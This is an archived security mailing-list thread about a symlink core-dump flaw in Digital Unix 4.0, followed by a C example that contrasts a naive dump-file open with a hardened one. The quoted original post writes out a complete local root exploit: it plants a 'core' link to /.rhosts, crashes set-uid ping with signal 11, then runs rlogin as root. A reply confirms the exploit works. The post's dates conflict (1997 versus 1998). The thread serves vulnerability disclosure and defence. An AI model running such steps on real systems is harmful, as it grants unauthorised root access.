BSDi 3.1 -> Didn't Work
Solaris 2.6 (Intel) -> Didn't work

Just to confirm:

DEC Unix 4.0d:

21158 Memory fault - core dumped
$ ls -la core
21159 Memory fault - core dumped
lrwxrwxrwx 1 jonz staff 8 Apr 6 15:18 core -> /.rhosts
$ ls -la /.rhosts
-rw------- 1 root system 458752 Apr 6 15:18 /.rhosts
$

Thank you,

Jonathan A. Zdziarski
Systems Administrator
Netrail Incorporated
888-NETRAIL
jonzat_private

On Sun, 6 Apr 1997, root wrote:

:Symlink problem in Digital Unix 4.0, discovered by |-ru5ty- and [SoReN]
:(28/03/1998)
:
:Starting 2 suid root programs in background, and killing them with -11 flag,
:we'll have a core root owned with our gid and mode 600. Then is enough a
:symlink to create a file everywhere...like /.rhosts.
:
:rustyat_private sorenat_private
:
:$ ls -l /.rhosts
:/.rhosts not found
:$ ls -l /usr/sbin/ping
:-rwsr-xr-x 1 root bin 32768 Nov 16 1996 /usr/sbin/ping
:$ ln -s /.rhosts core
:$ IMP='
:>+ +
:>'
:$ ping somehost &
:[1] 1337
:$ ping somehost &
:[2] 31337
:$ kill -11 31337
:$ kill -11 1337
:[1] Segmentation fault /usr/sbin/ping somehost (core dumped)
:[2] +Segmentation fault /usr/sbin/ping somehost (core dumped)
:$ ls -l /.rhosts
:-rw------- 1 root system 385024 Mar 29 05:17 /.rhosts
: ##/.rhosts has been created....that's all.##
:$ rlogin localhost -l root
:
:Is a very serious problem, it needs a fix as soon as possible,
:in fact we can have a DoS if we link our core to the kernel.
:
:
:Other platforms:
:
:SunOs 4.1.x 5.5.x Doesn't work
:Linux 2.0.x Doesn't work
:Digital Unix 4.0d Doesn't work
:Others (not tested yet)
:
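
Added example, not part of the original posts and not Digital Unix code or its vendor fix: a C program contrasting a dump-file open that follows a pre-planted "core" symlink with one that refuses it. The function names and the temporary-directory "victim" file standing in for /.rhosts are assumptions made for illustration.

```c
#define _GNU_SOURCE
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Behaviour the report describes: the dump writer opens "core" by name and
 * follows whatever is already there, including a symlink planted by the user. */
static int open_dump_naive(const char *path) {
    return open(path, O_WRONLY | O_CREAT | O_TRUNC, 0600);
}

/* Hardened open: O_EXCL makes creation fail if the name already exists (a
 * dangling symlink counts), and O_NOFOLLOW refuses a symlink as last component. */
static int open_dump_safe(const char *path) {
    return open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
}

/* Plants core -> victim in a private temp dir (constructed stand-in for
 * core -> /.rhosts), calls the opener, and reports whether the victim file
 * came into existence. Returns 1 if created, 0 if not, -1 on setup failure. */
static int target_created(int (*opener)(const char *)) {
    char dir[] = "/tmp/coredemoXXXXXX";
    char link_path[64], victim[64];
    struct stat st;

    if (mkdtemp(dir) == NULL) return -1;
    snprintf(link_path, sizeof link_path, "%s/core", dir);
    snprintf(victim, sizeof victim, "%s/victim", dir);
    if (symlink(victim, link_path) != 0) { rmdir(dir); return -1; }

    int fd = opener(link_path);
    if (fd >= 0) close(fd);
    int created = (lstat(victim, &st) == 0);

    unlink(victim);
    unlink(link_path);
    rmdir(dir);
    return created;
}

int main(void) {
    printf("naive open created symlink target: %d\n", target_created(open_dump_naive));
    printf("safe open created symlink target:  %d\n", target_created(open_dump_safe));
    return 0;
}
```

With the hardened open, a pre-existing "core" of any kind means no dump is written at all, which is the safe failure for a file created on behalf of a set-uid process.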
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 13:48:12 PDT